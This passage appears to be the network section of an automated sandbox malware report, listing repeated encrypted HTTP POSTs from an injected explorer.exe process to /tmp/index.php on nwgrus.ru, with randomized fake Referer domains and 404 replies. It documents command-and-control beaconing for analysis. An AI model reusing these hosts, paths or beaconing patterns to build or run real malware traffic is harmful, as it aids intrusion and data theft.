                                                                Oct 12, 2024 23:28:07.774832010 CEST313OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 33 40 ee e1
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu3@H%](lF]Eke?l{\0Jf.3y9NxP#i%By\o;]U;7Oj'lzQBB1
                                                                Oct 12, 2024 23:28:09.196805000 CEST189INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:08 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                Data Ascii: #\6Y9l_m=rA


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.449828190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:10.782593012 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ydoywfwjttlrcvfk.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 198
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:10.782609940 CEST198OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 78 43 ea 81
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA ,[k,vuxCksGGq;^=u?nAkM+oSN.4R a<$-??B%|h/C^
                                                                Oct 12, 2024 23:28:12.186402082 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.449839190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:12.201994896 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://yjtrvkrlityi.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 271
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:12.202006102 CEST271OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 51 32 d0 af
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuQ2_A{rBeFjY4uj;cnWF{)C/YsV5? n<~:QEY.6T6p}TRiyHgm~s7:t
                                                                Oct 12, 2024 23:28:13.597269058 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:13 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.449848190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:13.607196093 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://mjjimnkvahrtrhwm.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 338
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:13.607232094 CEST338OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 55 09 e3 f1
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuUT5nX?kphAOfHG1 Z55%RCPG&[L@$aqr=kO@%no<l=]J*
                                                                Oct 12, 2024 23:28:14.979952097 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:14 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.449856190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:14.988976955 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://gppslndiqwv.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 228
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:14.989056110 CEST228OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 54 00 e1 b8
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuTy8kpWKR``KZe`-Ce\T:d$-pC:'Yf`<Nk]"wrsB*
                                                                Oct 12, 2024 23:28:16.367022991 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:16 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.449862190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:16.376106024 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://gbbsahanxxry.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 190
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:16.376106024 CEST190OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 4b 4a f8 e7
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuKJWHksZ*PQ-h40}x?\V VL=CHEQ A4(mj0M#,
                                                                Oct 12, 2024 23:28:17.789314032 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:17 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.449873190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:17.809283018 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://qvmvwcqodtkhh.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 284
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:17.809319973 CEST284OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 56 33 e0 e3
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuV3b7GXcEjR>{T\E0@;j3{#%>.:6~K*}`TeZE0Bp&pctBQ~o_z%[
                                                                Oct 12, 2024 23:28:19.159792900 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:18 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.449882190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:19.170994997 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://wvcoypmusqw.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 312
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:19.170994997 CEST312OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 6e 24 b8 a8
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vun$qPqtx8]"%1FA"@#2-Z0$G?f<%^.1.}1?X~7F53_m}\&3R<Ox''@Ca
                                                                Oct 12, 2024 23:28:20.513290882 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:20 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.449890190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:20.523128033 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://drxslflnmsuof.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 237
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:20.523176908 CEST237OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 7c 47 b0 a4
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu|GQ@F*B"~0U>(_GR<79-P-cHRTE-u2M]NycVD+:i#hLCP2}
                                                                Oct 12, 2024 23:28:21.887073994 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:21 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.449901190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:21.895740032 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://juflamsakvad.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 318
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:21.895754099 CEST318OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2b 34 b0 ba
